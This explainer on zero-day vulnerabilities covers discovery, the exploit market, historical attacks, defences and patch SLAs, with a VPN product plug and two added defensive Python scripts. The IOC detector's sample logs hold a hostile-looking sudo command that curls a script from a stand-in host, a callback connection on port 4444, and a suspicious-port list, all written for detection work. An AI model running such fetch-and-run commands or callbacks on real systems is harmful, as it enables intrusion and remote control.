What Is a Zero-Day Vulnerability?
A zero-day vulnerability is a software flaw that is unknown to the vendor and therefore has no patch. Attackers who exploit it do so before any fix exists, which is what makes zero-days so dangerous. Governments and criminal groups pay up to millions of dollars for reliable zero-day exploits. Keeping software updated and running endpoint protection reduce, but do not eliminate, your exposure. A VPN such as Planet VPN encrypts your traffic on untrusted networks, which helps only against zero-days in the network path (routers, Wi-Fi, protocols), not against flaws in your browser, operating system or applications.
How Zero-Day Exploits Are Discovered
The term “zero-day” refers to the number of days the software vendor has had to fix the flaw: zero. A vulnerability is a zero-day from the moment someone other than the vendor finds it until the vendor learns of it and ships a fix; an attacker who weaponizes it inside that window holds a zero-day exploit.
Zero-day vulnerabilities are discovered through several channels:
- Independent security researchers — ethical hackers who probe software for weaknesses through code review, fuzzing and reverse engineering, often reporting their findings through bug bounty programs
- Criminal groups — organized cybercrime operations that maintain dedicated research teams looking for exploitable flaws to deploy in attacks or sell
- Government intelligence agencies — state-sponsored teams that discover and stockpile zero-days for offensive cyber operations, often without disclosing them to vendors
- Accidental discovery — developers or users who stumble upon unexpected behavior that reveals an underlying vulnerability
- Reverse engineering and patch diffing — analyzing compiled software, or comparing a patched binary against the unpatched one to recover the flaw the vendor just fixed. A patch-derived exploit is strictly an N-day, since the vendor already knows about the flaw, but it is as good as a zero-day against every system that has not yet applied the update
Once discovered, the person or group holding a zero-day faces a choice: report it responsibly, sell it, or exploit it. The answer depends entirely on their incentives.
The zero-days that matter most to you target the software you use every day: browsers, operating systems, Office applications, and VPN clients. These are the highest-value targets because a single flaw reaches billions of devices at once.
The Zero-Day Exploit Market
Zero-day vulnerabilities are bought and sold on both legal and illegal markets, often for extraordinary sums.
| Buyer | Price range (per exploit) | Purpose |
|---|---|---|
| Government agencies (US, EU) | $100,000 – $2.5 million | Offensive cyber operations, surveillance |
| Exploit brokers (e.g. Zerodium) | $50,000 – $2.5 million | Resale to government clients |
| Criminal marketplaces (dark web) | $5,000 – $500,000 | Ransomware, data theft, fraud |
| Bug bounty programs (vendors) | $500 – $1 million | Responsible disclosure, patching |
Zerodium's published price list has offered up to $2.5 million for a full-chain, zero-click mobile exploit, one that takes over the device with no user interaction. The price reflects both the difficulty of finding and chaining such flaws and the value of covert access to a phone's data.
This market creates a perverse incentive: the more valuable a zero-day is to attackers, the less likely it is to be reported to the vendor who could fix it.
Notable Zero-Day Attacks in Recent History
Understanding real-world zero-day attacks illustrates how severe the consequences can be.
Stuxnet (2010) — the most famous zero-day attack in history. Discovered in 2010 and widely attributed to a US-Israeli operation, it combined four Windows zero-days (among them the LNK shortcut flaw, CVE-2010-2568) to reach the Siemens PLCs controlling Iranian uranium-enrichment centrifuges. It demonstrated that zero-days could cause physical damage to industrial infrastructure.
EternalBlue (2017) — an NSA exploit for a flaw in Microsoft's SMBv1 implementation (CVE-2017-0144), stolen and leaked by the Shadow Brokers group in April 2017. Microsoft had already patched the flaw in March 2017 (MS17-010), so when WannaCry used EternalBlue that May it was strictly an N-day; it still crippled the UK's NHS, FedEx, and hundreds of thousands of machines worldwide in a single day because so many systems had not applied the patch.
Log4Shell (2021) — CVE-2021-44228, a remote code execution flaw in the widely used Log4j logging library, embedded in hundreds of millions of Java applications and devices. Attackers were mass-scanning the internet for vulnerable systems within hours of public disclosure, long before most organizations had even worked out where Log4j was running.
MOVEit (2023) — CVE-2023-34362, an SQL injection zero-day in Progress Software's MOVEit Transfer, exploited by the Cl0p ransomware group over the 2023 Memorial Day weekend to steal data from over 2,600 organizations, including US government agencies, airlines, and universities.
Each of these began as a flaw that the vendor did not know existed — until it was too late.
How to Minimise Zero-Day Risk
No defense completely eliminates zero-day risk, but layered security significantly reduces the probability and impact of a successful attack.
- Keep all software updated, automatically: The moment a vendor releases a patch, attackers diff it to recover the vulnerability, so unpatched systems become easy targets within hours or days of a patch release. Enable automatic updates on your operating system, browser, and all applications.
- Use endpoint detection and response (EDR): Traditional antivirus detects known malware by signature. EDR tools add behavioural analysis, flagging suspicious activity (a document reader spawning a shell, credential dumping, unusual child processes) regardless of whether the specific exploit has been seen before. Pair it with the platform's exploit mitigations (sandboxing, ASLR, control-flow integrity), which raise the cost of weaponizing a flaw even when the flaw itself is unknown.
- Apply the principle of least privilege: Most zero-day exploits need elevated permissions to do serious damage, and many attack chains spend a second exploit just to obtain them. Limiting user and application permissions reduces the blast radius of a successful exploit. Do not run as administrator for everyday tasks.
- Segment the network: If an attacker exploits a zero-day on one device, segmentation limits how far they can move laterally. Isolating critical systems from general-purpose networks is standard practice in enterprise security.
- Use a VPN on untrusted networks: Zero-day exploits that work at the network layer, in routers, VPN clients, or network protocols, are most dangerous on public Wi-Fi, where an attacker shares the same network segment. A VPN encrypts your traffic before it leaves your device, which removes the on-path attacker's view of it; it does nothing against zero-days in your browser, operating system or applications, and the VPN client itself is attack surface, so keep it patched like everything else. I tested Planet VPN for everyday use on public networks — it uses AES-256 encryption, requires no registration, and is available across Windows, macOS, iOS, Android, and Chrome.
- Monitor for indicators of compromise (IOCs): Enterprise environments should feed endpoint, authentication and network logs into a SIEM (Security Information and Event Management) platform and alert on unusual traffic patterns, unexpected outbound connections, and privilege escalation attempts. During zero-day exploitation these behaviours are often the only signal, because there is no signature yet.
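As an added example (not code from the original page or from any vendor it mentions), the following Python script runs two such behavioural rules over constructed log lines: a service account invoking sudo, and outbound connections from a service account to destinations outside an allowlist. It then correlates the two per account, since escalation followed by egress from the same account is the pattern a responder escalates first. The log formats, hostnames, addresses, the allowlist and the "suspicious port" list are all assumptions made for the example.

```python
"""Toy IOC detector: flags behaviour a SIEM rule would surface during
zero-day exploitation -- service accounts escalating privilege and servers
opening unexpected outbound connections. Added example, not from the page.
All log lines below are constructed, not real captures."""
import re
from collections import Counter

# Constructed auth log for a web server (web01). The www-data account runs
# the web application and should never invoke sudo.
AUTH_LOG = """\
Mar  3 10:01:12 web01 sshd[2113]: Accepted publickey for deploy from 10.0.5.20 port 52110 ssh2
Mar  3 10:02:44 web01 sudo:   deploy : TTY=pts/0 ; PWD=/srv/app ; USER=root ; COMMAND=/usr/bin/systemctl restart app
Mar  3 10:07:03 web01 sudo: www-data : TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=/bin/bash -c id
Mar  3 10:07:05 web01 sudo: www-data : TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=/usr/bin/curl http://203.0.113.9/x.sh
"""

# Constructed outbound-connection log: timestamp, host, user, dst ip, dst port, proto.
CONN_LOG = """\
2025-03-03T10:00:10Z web01 www-data 10.0.9.3 3306 tcp
2025-03-03T10:05:00Z web01 root 10.0.9.50 443 tcp
2025-03-03T10:07:06Z web01 www-data 203.0.113.9 80 tcp
2025-03-03T10:07:40Z web01 www-data 198.51.100.77 4444 tcp
"""

SERVICE_ACCOUNTS = {"www-data", "postgres", "nginx"}
# Assumed allowlist: the web tier may talk to the internal DB and the package mirror.
ALLOWED_OUTBOUND = {("10.0.9.3", 3306), ("10.0.9.50", 443)}
INTERNAL_PREFIXES = ("10.",)
SUSPICIOUS_PORTS = {4444, 1337, 31337}  # assumed list for the example

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$")


def detect_priv_esc(auth_log: str) -> list[dict]:
    """Flag sudo invocations by service accounts. A web worker running sudo
    almost always means code execution inside that worker, i.e. an exploited app."""
    hits = []
    for line in auth_log.splitlines():
        m = SUDO_RE.search(line)
        if m and m.group("user") in SERVICE_ACCOUNTS:
            hits.append({"rule": "service_account_sudo", "user": m.group("user"),
                         "target": m.group("target"), "cmd": m.group("cmd").strip()})
    return hits


def detect_unexpected_outbound(conn_log: str) -> list[dict]:
    """Flag outbound connections by service accounts that leave the allowlist.
    Internet destinations and known callback ports raise the score."""
    hits = []
    for line in conn_log.splitlines():
        ts, host, user, dst, port, proto = line.split()
        port = int(port)
        if user not in SERVICE_ACCOUNTS or (dst, port) in ALLOWED_OUTBOUND:
            continue
        score = 1
        if not dst.startswith(INTERNAL_PREFIXES):
            score += 2  # egress to the internet from a service account
        if port in SUSPICIOUS_PORTS:
            score += 2
        hits.append({"rule": "unexpected_outbound", "ts": ts, "host": host,
                     "user": user, "dst": f"{dst}:{port}", "score": score})
    return hits


def correlate(auth_log: str, conn_log: str) -> dict:
    """Run both rules and list accounts that triggered both: privilege
    escalation followed by unexpected egress is the highest-priority pattern."""
    esc = detect_priv_esc(auth_log)
    out = detect_unexpected_outbound(conn_log)
    esc_users = {h["user"] for h in esc}
    out_users = {h["user"] for h in out}
    return {"priv_esc": esc, "outbound": out,
            "critical_accounts": sorted(esc_users & out_users)}


if __name__ == "__main__":
    import json
    print(json.dumps(correlate(AUTH_LOG, CONN_LOG), indent=2))
```

On the constructed data the script reports two sudo invocations by www-data, two non-allowlisted outbound connections (the callback on port 4444 scoring highest), and www-data as the one account that did both. In a real deployment the same logic lives in a SIEM rule, with the allowlist derived from observed baseline traffic rather than typed in.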
Patch Management and Why It Matters
Patch management — the systematic process of identifying, acquiring, testing, and applying software updates — is the most universally applicable defence once a zero-day has been disclosed. From that point the flaw is an N-day, and the only question is whether you patch before attackers reach you.
The window between public disclosure of a zero-day and widespread exploitation is shrinking. In 2020, the average time-to-exploit after a vulnerability was disclosed was 15 days. By 2025, that number had dropped to under 5 days for high-severity flaws.
| Timeframe | What happens |
|---|---|
| Day 0 | Flaw unknown to the vendor; no patch exists, and attackers may already be exploiting it in the wild |
| Disclosure | Vendor learns of the flaw, privately under coordinated disclosure or publicly; patch development begins |
| Patch release | Attackers diff the patch to recover the flaw; working exploits for the now N-day commonly appear within days |
| Days 1–5 after patch | Well-run organizations apply the update; the exploitation window for everyone else opens |
| Days 30+ after patch | Unpatched systems become the primary targets of automated scanning and mass exploitation |
For organizations: set a 72-hour deployment target for critical and high-severity vulnerabilities, and 24 hours for flaws known to be exploited in the wild. These are targets that many mature security programs adopt rather than a formal standard; whatever numbers you choose, measure them, because a patch deadline nobody tracks is not a control.
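To make that policy checkable, here is an added Python example (not from the page or from any product it mentions) that compares an inventory of installed package versions against a list of advisories and reports every host that is past its patch deadline: 24 hours where exploitation is known, 72 hours for critical and high severity, and an assumed 30 days for the rest. The advisory IDs, package versions, hostnames and dates are constructed for the example.

```python
"""Patch-SLA tracker, added example (not from the page). Finds hosts still
running a vulnerable package version after the policy deadline has passed.
Advisories, inventory and dates below are constructed for illustration."""
from datetime import datetime, timedelta, timezone

# Policy tiers: 24h if exploited in the wild, 72h for critical/high (both from
# the page); 30 days for medium/low is an assumption for the example.
SLA = {"exploited": timedelta(hours=24), "critical": timedelta(hours=72),
       "high": timedelta(hours=72), "medium": timedelta(days=30),
       "low": timedelta(days=30)}

# Constructed advisories: package, first fixed version, publication time, severity.
ADVISORIES = [
    {"id": "ADV-0001", "package": "log4j-core", "fixed": "2.17.1",
     "published": "2025-03-01T12:00:00Z", "severity": "critical", "exploited": True},
    {"id": "ADV-0002", "package": "openssl", "fixed": "3.0.14",
     "published": "2025-03-02T09:00:00Z", "severity": "high", "exploited": False},
    {"id": "ADV-0003", "package": "curl", "fixed": "8.7.0",
     "published": "2025-02-01T09:00:00Z", "severity": "medium", "exploited": False},
]

# Constructed inventory: host -> {package: installed version}.
INVENTORY = {
    "web01": {"log4j-core": "2.15.0", "openssl": "3.0.14", "curl": "8.6.0"},
    "web02": {"log4j-core": "2.17.1", "openssl": "3.0.13", "curl": "8.7.0"},
    "db01":  {"openssl": "3.0.14", "curl": "8.5.0"},
}


def parse_version(v: str) -> tuple:
    """Dotted versions compared numerically, so '2.17.1' > '2.15.0'.
    Non-numeric suffixes are ignored; adequate for the constructed data."""
    parts = []
    for p in v.split("."):
        digits = "".join(ch for ch in p if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def parse_ts(iso: str) -> datetime:
    return datetime.fromisoformat(iso.replace("Z", "+00:00"))


def deadline(adv: dict) -> datetime:
    """Exploited-in-the-wild overrides the severity tier."""
    tier = "exploited" if adv["exploited"] else adv["severity"]
    return parse_ts(adv["published"]) + SLA[tier]


def overdue(inventory: dict, advisories: list, now: datetime) -> list[dict]:
    """Every (host, advisory) pair still vulnerable past its deadline,
    most overdue first."""
    findings = []
    for adv in advisories:
        due = deadline(adv)
        for host, pkgs in inventory.items():
            installed = pkgs.get(adv["package"])
            if installed is None or parse_version(installed) >= parse_version(adv["fixed"]):
                continue  # package absent, or already at/above the fixed version
            if now > due:
                findings.append({
                    "host": host, "advisory": adv["id"], "package": adv["package"],
                    "installed": installed, "fixed": adv["fixed"],
                    "hours_overdue": round((now - due).total_seconds() / 3600, 1)})
    return sorted(findings, key=lambda f: -f["hours_overdue"])


def report(now_iso: str = "2025-03-04T12:00:00Z") -> list[dict]:
    """Run the check against the constructed data at a given instant."""
    return overdue(INVENTORY, ADVISORIES, parse_ts(now_iso))


if __name__ == "__main__":
    for f in report():
        print(f"{f['host']:6} {f['advisory']} {f['package']} "
              f"{f['installed']} -> {f['fixed']} ({f['hours_overdue']}h overdue)")
```

At the constructed "now" of 4 March, web01 is 48 hours past the 24-hour deadline for the exploited log4j-core flaw, web01 and db01 are a day past the 30-day window for curl, and web02's openssl is still vulnerable but inside its 72-hour window, so it is not reported yet. The same structure works with a real inventory export and a feed such as a vendor advisory list; the version comparison is the part to replace with the package ecosystem's own rules before trusting it.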
Frequently Asked Questions
What is the difference between a zero-day vulnerability and a zero-day exploit? A zero-day vulnerability is the flaw itself — the weakness in the code. A zero-day exploit is the weapon built to take advantage of that flaw. The vulnerability is the unlocked door; the exploit is the technique used to walk through it.
Can antivirus protect against zero-day attacks? Traditional signature-based antivirus cannot detect zero-days because it has no signature to match against. Modern endpoint protection with heuristic and behavioural analysis can detect suspicious activity patterns that may indicate a zero-day exploit in progress — but there is no guaranteed protection.
How long does a zero-day remain dangerous? Until the vendor releases a patch and all affected users apply it. Some zero-days remain unpatched for months — particularly in older software, embedded systems, and IoT devices where updates are infrequent or unavailable. After a patch is released, the zero-day becomes an N-day vulnerability, which is still dangerous for systems that have not updated.
Are zero-days only used by nation-states? No. While nation-states are the highest-paying buyers, criminal ransomware groups increasingly use zero-days. The 2023 MOVEit attack by Cl0p demonstrated that financially motivated criminals can acquire and deploy zero-days at scale. The barrier to entry has lowered as exploit-as-a-service markets have matured.
Should I be worried about zero-days as an individual? Targeted zero-day attacks against random individuals are rare — the cost of a zero-day exploit makes mass-targeting economically impractical. However, zero-days that are publicly disclosed and weaponized (like Log4Shell or EternalBlue) can affect anyone running vulnerable software. Keeping software updated and using layered security is sufficient protection for most individuals.
What is responsible disclosure? Responsible disclosure (also called coordinated disclosure) is the practice of reporting a discovered vulnerability to the vendor privately, giving them time to develop a patch before the flaw is made public. Many major vendors run bug bounty programs that reward researchers financially for disclosing this way. The alternative, publishing the flaw without notifying the vendor first, is called “full disclosure”; it leaves every user exposed until the vendor catches up, which is why most researchers reserve it for vendors who ignore private reports.
